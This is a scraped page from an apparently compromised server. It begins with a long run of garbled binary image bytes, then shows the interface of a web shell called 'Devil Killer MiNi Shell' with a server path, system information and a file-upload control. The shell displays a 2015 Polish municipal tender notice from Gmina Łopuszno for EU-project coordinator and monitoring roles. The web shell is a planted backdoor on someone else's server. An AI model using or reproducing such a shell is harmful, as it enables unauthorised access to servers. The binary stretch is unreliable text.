JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150211/30456-N-2015.html

<p class="kh_header"><b>Łopuszno: Świadczenie usług polegających na pełnieniu funkcji koordynatora i specjalisty ds. monitoringu i sprawozdawczości w zakresie projektu pn. Radosne przedszkolaki oraz Rozwijamy kompetencje kluczowe realizowanego w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 30456 - 2015; data zamieszczenia: 11.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łopuszno , ul. Konecka 12, 26-070 Łopuszno, woj. świętokrzyskie, tel. 41 3914009, faks 41 3914054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lopuszno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług polegających na pełnieniu funkcji koordynatora i specjalisty ds. monitoringu i sprawozdawczości w zakresie projektu pn. Radosne przedszkolaki oraz Rozwijamy kompetencje kluczowe realizowanego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Świadczenie usług polegających na pełnieniu funkcji koordynatora i specjalisty ds. monitoringu i sprawozdawczości w zakresie projektu pn. Radosne przedszkolaki oraz Rozwijamy kompetencje kluczowe współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 - Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.1 - Zmniejszenie nierówności w stopniu upowszechnienia edukacji przedszkolnej.

Przedmiot zamówienia podzielony został na 3 części i obejmuje:
Część I. Zatrudnienie Koordynatora do realizowanych projektów unijnych pod nazwą Radosne przedszkolaki w wymiarze 120 godzin miesięcznie oraz Rozwijamy kompetencje kluczowe w wymiarze 90 godzin miesięcznie na okres od 01.03.2015 r. do 30.06.2015r. 
Projekt realizowany jest od września 2013 roku. Zatrudnienie koordynatora ma charakter dokończenia dotychczasowych działań i rozliczenia projektów. 
Zakres obowiązków koordynatora projektu: 	
- podejmowanie niezbędnych działań mających na celu osiągnięcie wskaźników rezultatu projektu, 
- nadzór nad prawidłową realizacją merytorycznych działań projektu, zgodnie 
z wymogami POKL oraz obowiązującymi przepisami krajowymi, w oparciu o umowę 
o dofinansowanie wraz z załącznikami, 
- informowanie zamawiającego o wszelkich nieprawidłowościach związanych 
z realizacją projektu,
- planowanie i podejmowanie wszelkich działań związanych z terminową i prawidłową realizacją projektu,
- przygotowanie wszelkiej dokumentacji wymaganej do prawidłowej realizacji projektu,
- przygotowanie, koordynowanie i nadzorowanie prac związanych z promocją, ewaluacją, realizacją oraz rozliczeniem projektu, 
- przygotowanie części sprawozdawczej i finansowej wniosków o płatność zaliczkową i końcową,
- przygotowanie umów cywilnoprawnych w ramach projektu, 
- nadzór nad ewidencjonowaniem czasu pracy osób zaangażowanych do realizacji projektu,
- przygotowanie upoważnień do przetwarzania danych osobowych dla personelu projektu oraz zgłoszenie ich do rejestru upoważnień objętych projektem,
- przestrzeganie procedur związanych z ochroną danych osobowych uczestników projektu, personelu oraz kontrahentów,
- przygotowanie i koordynacja korespondencji związanej z realizacją projektu,
- monitorowanie postępów i poziomu osiągnięcia rezultatów projektu oraz postępu finansowego w poszczególnych okresach czasu, podejmowanie wszelkich działań zaradczych i naprawczych w przypadku występowania problemów w realizacji projektu,
- organizowanie spotkań monitorujących z pracownikami projektu,
- zgłaszanie do ŚBRR wszelkich zmian w realizacji i w budżecie projektu, przygotowywanie formularzy zmian merytorycznych i budżetowych,
- nadzór nad terminowym i prawidłowym przygotowaniem części finansowej 
i sprawozdawczej wniosków o płatność,
- prowadzenie kontroli realizacji działań oraz nadzór nad monitoringiem wykorzystania materiałów do części praktycznych oraz innych towarów zakupionych w ramach projektu, 
- udział w kontrolach prowadzonych przez organy zewnętrzne,
- zorganizowanie biura projektu zgodnie z założeniami i wytycznymi (zakupy, oznakowanie),
- zapewnienie właściwego przepływu informacji pomiędzy pracownikami projektu, 
- nadzór nad prawidłową realizacją promocji projektu - zapewnienie zgodności wizualizacji materiałów informacyjno - promocyjnych z umową partnerską na rzecz realizacji projektu oraz wytycznymi dotyczącymi oznaczania projektów w ramach POKL,
- prowadzenie ewaluacji projektu, w tym badania postępów w realizacji projektu oraz opracowanie raportu ewaluacyjnego po zakończeniu działań ( realizacji ),
- nadzór nad dokumentacją potwierdzającą kwalifikowalność beneficjenta ostatecznego projektu,
- nadzór nad prowadzeniem bazy danych PEFS, 
- sprawdzanie i zatwierdzanie kart pracy,
- nadzór nad prawidłową realizacją umów na świadczenie usług oraz dostawy, zawartych w ramach postępowań o udzielenie zamówienia publicznego, 
- śledzenie dokumentów, wytycznych, które w trakcie realizacji projektu mogą ulec zmianie w celu zapewnienia zgodności projektu z wytycznymi, jak również prawem RP i UE,
- koordynowanie działań projektowych, 
- kierowanie wykonaniem projektu w formie nadzoru merytorycznego i technicznego zgodnie z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu i wnioskiem o dofinansowanie oraz przepisami krajowymi i unii europejskiej,
- nadzorowanie nad całością prac związanych z realizacją projektu i ich jakością, koordynacja działań merytorycznych i logistycznych związanych z projektem, zarządzanie planowanymi działaniami projektowymi,
- nadzorowanie bieżących postępów realizacji projektu i ich jakością,
- nadzorowanie prawidłowego przeprowadzenia promocji projektu,
- przygotowywanie dokumentów związanych z realizacją projektu, 
- zatwierdzanie planów pracy dla poszczególnych działań projektowych,
- sprawowanie nadzoru nad całością prac związanych z realizacją projektu, ich jakością i terminowością oraz nad personelem projektu,
- przydzielanie i koordynowanie zadań dla wszystkich osób zaangażowanych 
w realizację projektu,
- kontrola jakości realizacji zadań pod kątem osiągnięcia założonych wskaźników;
- wykonanie wskaźnika projektu,
- przygotowywanie i koordynacja korespondencji związanej z projektem do Instytucji Pośredniczącej,
- nadzór nad zgodnością prowadzonych działań z zapisami zawartymi we wniosku, 
w tym budżecie i harmonogramie,
- sporządzanie wniosków o płatność i terminowym ich przekazaniem Instytucji Pośredniczącej oraz sprawozdań rzeczowych z postępów realizacji projektu, w tym sporządzenie ostatniego wniosku o płatność zgodnie obowiązującymi dokumentami programowymi i aktualnymi wytycznymi Instytucji Pośredniczącej,
- wprowadzanie w Generatorze Wniosków Aplikacyjnych zmian do projektu w oparciu o obowiązujące zapisy zawarte w dokumentacji konkursowej, umowie 
o dofinansowanie projektu, dokumentacji programowej Programu Operacyjnego Kapitał Ludzki,
- uzgadnianie i przekazywanie w formie pisemnej informacji o dokonywanych zmianach w projekcie z Instytucją Pośredniczącą w uzgodnieniu z Zamawiającym,
- bieżący kontakt z Instytucją Pośredniczącą oraz innymi organizacjami zaangażowanymi w realizację projektu, dokonywanie systematycznej kontroli pracy
i uzyskanych efektów,
- obecność podczas kontroli projektu w trakcie jego realizacji,
- weryfikowanie pod względem merytorycznym dokumentów, które powstały 
w projekcie,
- sporządzanie i archiwizacja dokumentacji projektowej,
- inne zadania niezbędne do prawidłowej realizacji projektu nie wymienione wyżej 
a zlecone przez Zamawiającego,

Wykształcenie:
Wyższe wykształcenie pedagogiczne - ukończone studia magisterskie z przygotowaniem pedagogicznym.
Ukończone kursy dotyczące realizacji projektów unijnych organizowane przez ROEFS i inne - minimum 5.
Minimum 2 letnie doświadczenie w pracy w projektach unijnych w ramach POKL.
Dyspozycyjność, dobra organizacja pracy, predyspozycje do pracy w projektach unijnych.  

Część II. Zatrudnienie Specjalisty ds. monitoringu i sprawozdawczości do realizowanego projektu unijnego pod nazwą Radosne przedszkolaki w wymiarze 90 godzin miesięcznie na okres od 01.03.2015 r. do 30.06.2015 r. 
Projekt realizowany jest od września 2013 roku. Zatrudnienie specjalisty ma charakter dokończenia dotychczasowych działań i rozliczenia projektu. 
Zakres obowiązków specjalisty ds. monitoringu i sprawozdawczości obejmuje: 
- nadzór nad prawidłową realizacją merytorycznych działań projektu,
- planowanie i podejmowanie wszelkich działań związanych z terminową i prawidłową realizacją projektu,
- wspieranie i pomoc w działaniach koordynatora, bieżące kontakty i korespondencja, wyjaśnianie wszelkich nieprawidłowości w realizacji projektu, 
- przygotowywanie wszelkiej dokumentacji wymaganej do prawidłowej realizacji projektu. 
- zgłaszanie do koordynatora projektu oraz uzgadnianie z koordynatorem projektu wszelkich zmian w realizacji projektu, współpraca z księgowym projektu, 
- tworzenie opisów przedmiotów zamówienia w zakresie zakupów,
- nadzorowanie odbioru zakupionego sprzętu,
- współpraca z członkami zespołu projektowego, 
- podejmowanie wszelkich działań zaradczych i naprawczych w przypadku występowania problemów w realizacji projektu w danej szkole,
- zagwarantowanie właściwych warunków pracy na poszczególnych zajęciach (odpowiedni sprzęt, wyposażenie) zapewniając prawidłowy ich przebieg. Współpraca z nauczycielami biorącymi udział w realizacji projektu oraz przekazywanie informacji do biura projektu o zapotrzebowaniu na materiały biurowe, itp.
- sprawdzanie dzienników nauczycielom prowadzącym zajęcia i ich zatwierdzanie, 
- informowanie potencjalnych uczestników oraz społeczeństwa o fakcie współfinansowania przedsięwzięcia ze środków Unii Europejskiej w ramach EFS, 
- informowanie uczniów, nauczycieli/trenerów i osób zainteresowanych o wszelkich zmianach w realizacji projektu i działań,
- prowadzenie kontroli realizacji działań projektowych,
- wizualizacja materiałów szkoleniowych i podręczników poprzez umieszczenie naklejki informacyjnej oraz kompletowanie zestawów szkoleniowych dla uczniów 
i przekazywanie ich nauczycielom. Uzyskanie potwierdzenia odbioru materiałów szkoleniowych, 
- współudział w organizacji spotkań informacyjnych dla uczniów i rodziców w obrębie,
- bezpośredni kontakt z uczniami w sprawach dotyczących projektu. Informowanie uczniów i rodziców we wszelkich sprawach dotyczących projektu. Współpraca 
z rodzicami w zakresie informowania o udziale i postępach uczniów w ramach działań projektowych,
- pozyskanie uczestników projektu oraz danych osobowych uczestników projektu 
w zakresie przewidzianym w formularzu PEFS, oświadczeń o wyrażeniu zgody na przetwarzanie danych oraz deklaracji uczestnictwa w projekcie,
- przestrzeganie procedur związanych z ochrona danych osobowych uczestników projektu, personelu oraz kontrahentów. Zabezpieczenie zebranych danych osobowych uczestników oraz przekazanie ich do biura projektu,
- wydruk ankiet początkowych i końcowych oraz innych wymaganych dla prawidłowej realizacji projektu oraz przekazanie ich nauczycielowi prowadzącemu zajęcia, celem przeprowadzenia badania, 
- weryfikacja wyników ankiet i ich rejestracja w bazie EXCEL prowadzonej w szkole, 
- tworzenie harmonogramów zajęć dodatkowych i wycieczek,
- współpraca przy opracowaniu części sprawozdawczej wniosków o płatność, 
- przygotowanie i weryfikacja dokumentacji zajęć (w tym m.in. dzienników zajęć),
- opracowanie instrukcji archiwizacji dokumentów projektowych i archiwizowanie ich zgodnie z instrukcją, 

Wykształcenie:
Co najmniej średnie.
Doświadczenie w pracy w projektach unijnych w ramach POKL.
Ukończone kursy dotyczące realizacji projektów unijnych organizowane przez ROEFS i inne - minimum 2.
Dyspozycyjność, dobra organizacja pracy, Predyspozycje do pracy w projektach unijnych.

Część III. Zatrudnienie Specjalisty ds. monitoringu i sprawozdawczości do realizowanych projektów unijnych pod nazwą Rozwijamy kompetencje kluczowe 
w wymiarze 70 godzin miesięcznie na okres od 01.03.2015 r. do 30.06.2015 r. 
Projekt realizowany jest od września 2013 roku. Zatrudnienie specjalisty ma charakter dokończenia dotychczasowych działań i rozliczenia projektu. 
Zakres obowiązków specjalisty ds. monitoringu i sprawozdawczości obejmuje: 
- nadzór nad prawidłową realizacją merytorycznych działań projektu,
- planowanie i podejmowanie wszelkich działań związanych z terminową i prawidłową realizacją projektu,
- wspieranie i pomoc w działaniach koordynatora, bieżące kontakty i korespondencja, wyjaśnianie wszelkich nieprawidłowości w realizacji projektu, 
- przygotowywanie wszelkiej dokumentacji wymaganej do prawidłowej realizacji projektu. 
- zgłaszanie do koordynatora projektu oraz uzgadnianie z koordynatorem projektu wszelkich zmian w realizacji projektu, współpraca z księgowym projektu, 
- tworzenie opisów przedmiotów zamówienia w zakresie zakupów,
- nadzorowanie odbioru zakupionego sprzętu,
- współpraca z członkami zespołu projektowego, 
- podejmowanie wszelkich działań zaradczych i naprawczych w przypadku występowania problemów w realizacji projektu w danej szkole,
- zagwarantowanie właściwych warunków pracy na poszczególnych zajęciach (odpowiedni sprzęt, wyposażenie) zapewniając prawidłowy ich przebieg. Współpraca z nauczycielami biorącymi udział w realizacji projektu oraz przekazywanie informacji do biura projektu o zapotrzebowaniu na materiały biurowe, itp.
- sprawdzanie dzienników nauczycielom prowadzącym zajęcia i ich zatwierdzanie, 
- informowanie potencjalnych uczestników oraz społeczeństwa o fakcie współfinansowania przedsięwzięcia ze środków Unii Europejskiej w ramach EFS, 
- informowanie uczniów, nauczycieli/trenerów i osób zainteresowanych o wszelkich zmianach w realizacji projektu i działań,
- prowadzenie kontroli realizacji działań projektowych,
- wizualizacja materiałów szkoleniowych i podręczników poprzez umieszczenie naklejki informacyjnej oraz kompletowanie zestawów szkoleniowych dla uczniów 
i przekazywanie ich nauczycielom. Uzyskanie potwierdzenia odbioru materiałów szkoleniowych, 
- współudział w organizacji spotkań informacyjnych dla uczniów i rodziców w obrębie,
- bezpośredni kontakt z uczniami w sprawach dotyczących projektu. Informowanie uczniów i rodziców we wszelkich sprawach dotyczących projektu. Współpraca 
z rodzicami w zakresie informowania o udziale i postępach uczniów w ramach działań projektowych,
- pozyskanie uczestników projektu oraz danych osobowych uczestników projektu 
w zakresie przewidzianym w formularzu PEFS, oświadczeń o wyrażeniu zgody na przetwarzanie danych oraz deklaracji uczestnictwa w projekcie,
- przestrzeganie procedur związanych z ochrona danych osobowych uczestników projektu, personelu oraz kontrahentów. Zabezpieczenie zebranych danych osobowych uczestników oraz przekazanie ich do biura projektu,
- wydruk ankiet początkowych i końcowych oraz innych wymaganych dla prawidłowej realizacji projektu oraz przekazanie ich nauczycielowi prowadzącemu zajęcia, celem przeprowadzenia badania, 
- weryfikacja wyników ankiet i ich rejestracja w bazie EXCEL prowadzonej w szkole, 
- tworzenie harmonogramów zajęć dodatkowych i wycieczek,
- współpraca przy opracowaniu części sprawozdawczej wniosków o płatność, 
- przygotowanie i weryfikacja dokumentacji zajęć (w tym m.in. dzienników zajęć),
- opracowanie instrukcji archiwizacji dokumentów projektowych i archiwizowanie ich zgodnie z instrukcją, 

Wykształcenie:
Co najmniej średnie.
Doświadczenie w pracy w projektach unijnych w ramach POKL.
Ukończone kursy dotyczące realizacji projektów unijnych organizowane przez ROEFS i inne - minimum 2.
Dyspozycyjność, dobra organizacja pracy, Predyspozycje do pracy w projektach unijnych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 72.22.40.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonego z ofertą oświadczenia o spełnieniu warunków udziału 
w postępowaniu o których mowa w art. 22 ust. 1 ustawy Pzp wg. wzoru zał. Nr 2 do SIWZ (dla części 1, 2 i 3)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonego z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 ustawy Pzp wg. wzoru zał. Nr 2 do SIWZ (dla części 1, części 2 i części 3)

- dla części 1 - wykonawca winien wykazać się doświadczeniem w realizacji i zarządzaniu projektami - zarządzanie minimum 2 projektami realizowanymi w ramach POKL (przed dniem złożenia oferty) 

- dla części 2 i 3 - wykonawca winien wykazać się doświadczeniem w realizacji projektów - udział w realizacji minimum 1 projektu w ramach POKL (przed dniem złożenia oferty)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonego z ofertą oświadczenia o spełnieniu warunków udziału 
w postępowaniu o których mowa w art. 22 ust. 1 ustawy Pzp wg. wzoru zał. Nr 2 do SIWZ (dotyczy części 1,2 i 3)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonego z ofertą oświadczenia o spełnieniu warunków udziału 
w postępowaniu o których mowa w art. 22 ust. 1 ustawy Pzp wg. wzoru zał. Nr 2 do SIWZ (dotyczy części 1,2 i 3)

- Dla części 1
Wykonawca musi wykazać, że posiada wyższe wykształcenie pedagogiczne - ukończone studia magisterskie z przygotowaniem pedagogicznym z minimum 2 letnim stażem, posiada doświadczenie z zakresu prowadzenia projektów unijnych oraz ukończone minimum 5 kursów/ szkoleń dotyczących realizacji projektów finansowanych z funduszy Unii Europejskiej .

- Dla części 2
Wykonawca musi wykazać, że posiada co najmniej wykształcenie średnie z minimum  rocznym stażem, posiada wiedzę na temat projektów unijnych potwierdzoną minimum 2 świadectwami uczestnictwa w szkoleniu z EFS.

- Dla części 3
Wykonawca musi wykazać, że posiada co najmniej wykształcenie średnie z minimum  rocznym stażem, posiada wiedzę na temat projektów unijnych potwierdzoną minimum 2 świadectwami uczestnictwa w szkoleniu z EFS.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonego z ofertą oświadczenia o spełnieniu warunków udziału 
w postępowaniu o których mowa w art. 22 ust. 1 ustawy Pzp wg. wzoru zał. Nr 2 do SIWZ (dotyczy części 1, 2 i 3).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne postanowienia umowy zawarte są we wzorze umowy, który jest załącznikiem Nr 6 i 6/1 do niniejszej SIWZ.
2. Zamawiającemu przysługuje prawo do zmiany postanowień umowy zawartej w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w sytuacjach jak niżej:
a) zmiana terminu realizacji przedmiotu zamówienia:
- wystąpienia okoliczności siły wyższej jako zdarzenia niezależnego od żadnej ze stron umowy, które nastąpiło po jej zawarciu
- wydłużenia lub skrócenia okresu trwania umowy z uwagi na okoliczności, których nie można było przewidzieć w chwili jej zawarcia stosownie do zmian w harmonogramie i innych zapisów we wniosku o dofinansowanie zaakceptowanych przez Instytucję Pośredniczącą bez dodatkowego wynagrodzenia, chyba że zaakceptowane zmiany przez Instytucję Pośredniczącą stanowią inaczej.
b) zmiana w przypadku następujących okoliczności
- w przypadku wszystkich zmian obiektywnie ocenionych jako korzystne dla zamawiającego w sytuacji nieprzewidzianej i niezawinionej przez strony umowy których nie dało się przewidzieć pomimo zachowania należytej staranności
- w przypadku wystąpienia rozbieżności lub niejasności w rozumieniu pojęć użytych 
w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie tych rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji przez strony możliwa będzie zmiana postanowień umowy z zgodą obu stron.
